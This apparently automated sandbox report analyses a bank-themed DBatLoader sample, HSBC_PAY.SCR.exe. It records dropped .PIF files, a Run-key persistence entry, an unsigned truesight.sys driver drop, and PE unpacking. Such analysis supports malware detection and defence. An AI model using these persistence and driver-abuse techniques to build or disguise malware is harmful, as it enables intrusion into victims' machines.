                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: spp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: uzonfntK.pif, 00000003.00000003.1957883570.0000000028DF7000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000003.1954844272.0000000028C46000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000003.00000002.2132668058.000000002913E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: uzonfntK.pif, uzonfntK.pif, 00000008.00000002.2215530629.000000001E95E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000002.2215530629.000000001E7C0000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2136979229.000000001E619000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000003.2131723538.000000001E339000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2193790873.0000000028331000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000003.2188220220.000000002818A000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.000000002867E000.00000040.00001000.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2280949456.00000000284E0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216B1000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.0000000021682000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.0000000020760000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.0000000000742000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845221784.000000000076B000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.0000000020696000.00000004.00001000.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\Public\Libraries\uzonfntK.pifUnpacked PE file: 3.2.uzonfntK.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\uzonfntK.pifUnpacked PE file: 8.2.uzonfntK.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Source: C:\Users\Public\Libraries\uzonfntK.pifUnpacked PE file: 14.2.uzonfntK.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;
                      Yara detected DBatLoader
                      Source: Yara matchFile source: 0.2.HSBC_PAY.SCR.exe.2a80000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000001.1848189708.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2255713355.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1704893572.000000000224B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2197880197.0000000000F60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1642008766.000000007FD90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000001.1938553898.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: uzonfntK.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A98798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02A98798
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A832FC push eax; ret 0_2_02A83338
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02AAC2FC push 02AAC367h; ret 0_2_02AAC35F
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8635A push 02A863B7h; ret 0_2_02A863AF
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8635C push 02A863B7h; ret 0_2_02A863AF
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02AAC0AC push 02AAC125h; ret 0_2_02AAC11D
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02AAC1F8 push 02AAC288h; ret 0_2_02AAC280
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02AAC144 push 02AAC1ECh; ret 0_2_02AAC1E4
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A986B8 push 02A986FAh; ret 0_2_02A986F2
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A86738 push 02A8677Ah; ret 0_2_02A86772
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A86736 push 02A8677Ah; ret 0_2_02A86772
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8C4EC push ecx; mov dword ptr [esp], edx0_2_02A8C4F1
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9E5AC push ecx; mov dword ptr [esp], edx0_2_02A9E5B1
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8D520 push 02A8D54Ch; ret 0_2_02A8D544
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8CB6C push 02A8CCF2h; ret 0_2_02A8CCEA
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02AABB64 push 02AABD8Ch; ret 0_2_02AABD84
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8CB5A push 02A8CCF2h; ret 0_2_02A8CCEA
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9788C push 02A97909h; ret 0_2_02A97901
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A968C8 push 02A96973h; ret 0_2_02A9696B
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A968C6 push 02A96973h; ret 0_2_02A9696B
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9890E push 02A98948h; ret 0_2_02A98940
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9A918 push 02A9A950h; ret 0_2_02A9A948
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A98910 push 02A98948h; ret 0_2_02A98940
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A92EE0 push 02A92F56h; ret 0_2_02A92F4E
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A92FEB push 02A93039h; ret 0_2_02A93031
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A92FEC push 02A93039h; ret 0_2_02A93031
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A95DFC push ecx; mov dword ptr [esp], edx0_2_02A95DFE
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_0040D99D push esp; iretd 3_2_0040D99E
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_00416373 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_00416305 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004163B1 push ds; iretd 3_2_00416372
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_004034E0 push eax; ret 3_2_004034E2

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with a suspicious file extension
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeFile created: C:\Users\Public\Libraries\Ktnfnozu.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeFile created: C:\Users\Public\Libraries\uzonfntK.pifJump to dropped file
                      Sample is not signed and drops a device driver
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeFile created: C:\Users\Public\Libraries\Ktnfnozu.PIFJump to dropped file
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeFile created: C:\Users\Public\Libraries\uzonfntK.pifJump to dropped file
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KtnfnozuJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KtnfnozuJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A9A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02A9A954
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
